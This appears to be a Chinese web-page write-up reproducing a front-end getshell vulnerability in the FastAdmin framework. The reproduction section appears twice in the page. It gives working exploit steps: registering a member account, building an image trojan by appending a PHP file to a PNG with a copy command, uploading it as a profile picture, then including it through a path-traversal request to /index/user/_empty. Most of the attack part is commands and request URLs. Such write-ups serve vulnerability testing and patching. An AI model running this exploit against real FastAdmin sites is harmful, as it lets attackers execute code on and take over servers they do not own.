Fastadmin前台Getshell漏洞复现
时间:2023年06月11日
/来源:网络
/编辑:佚名
一、简介
FastAdmin是一款基于ThinkPHP5+Bootstrap开发的极速后台开发框架。FastAdmin基于Apache2.0开源协议发布,目前被广泛应用于各大行业应用后台管理。
二、漏洞复现
注:在Linux下,通过这种方法会失效,因为在 /public 路径下不存在 user 目录
1、登录前台会员中心,注册一个账户
2、使用注册的账户登录,点击会员中心"-》"个人资料"处,上传一个jpg图片马
合成图片木马test666.png
copy 1.png/b+1.php/a test666.png
查看图片木马看到有<?php phpinfo();?>
3、构造POC,GET /index/user/_empty?name=../../public/uploads/路径.jpg,
访问http://xx.xx.xx.xx/index.php/index/user/_empty?name=../../public/uploads/20200924/500309dcf5c48dd851a218caa0f65566.jpg
FastAdmin是一款基于ThinkPHP5+Bootstrap开发的极速后台开发框架。FastAdmin基于Apache2.0开源协议发布,目前被广泛应用于各大行业应用后台管理。
二、漏洞复现
注:在Linux下,通过这种方法会失效,因为在 /public 路径下不存在 user 目录
1、登录前台会员中心,注册一个账户
2、使用注册的账户登录,点击会员中心"-》"个人资料"处,上传一个jpg图片马
合成图片木马test666.png
copy 1.png/b+1.php/a test666.png
查看图片木马看到有<?php phpinfo();?>
3、构造POC,GET /index/user/_empty?name=../../public/uploads/路径.jpg,
访问http://xx.xx.xx.xx/index.php/index/user/_empty?name=../../public/uploads/20200924/500309dcf5c48dd851a218caa0f65566.jpg
新闻资讯 更多
- 【建站知识】查询nginx日志状态码大于400的请求并打印整行04-03
- 【建站知识】Python中的logger和handler到底是个什么?04-03
- 【建站知识】python3拉勾网爬虫之(您操作太频繁,请稍后访问)04-03
- 【建站知识】xpath 获取meta里的keywords及description的方法04-03
- 【建站知识】python向上取整以50为界04-03
- 【建站知识】scrapy xpath遇见乱码解决04-03
- 【建站知识】scrapy爬取后中文乱码,解决word转为html 时cp1252编码问题04-03
- 【建站知识】scrapy采集—爬取中文乱码,gb2312转为utf-804-03
猜你需要
豫ICP备2021026617号-1
豫公网安备:41172602000185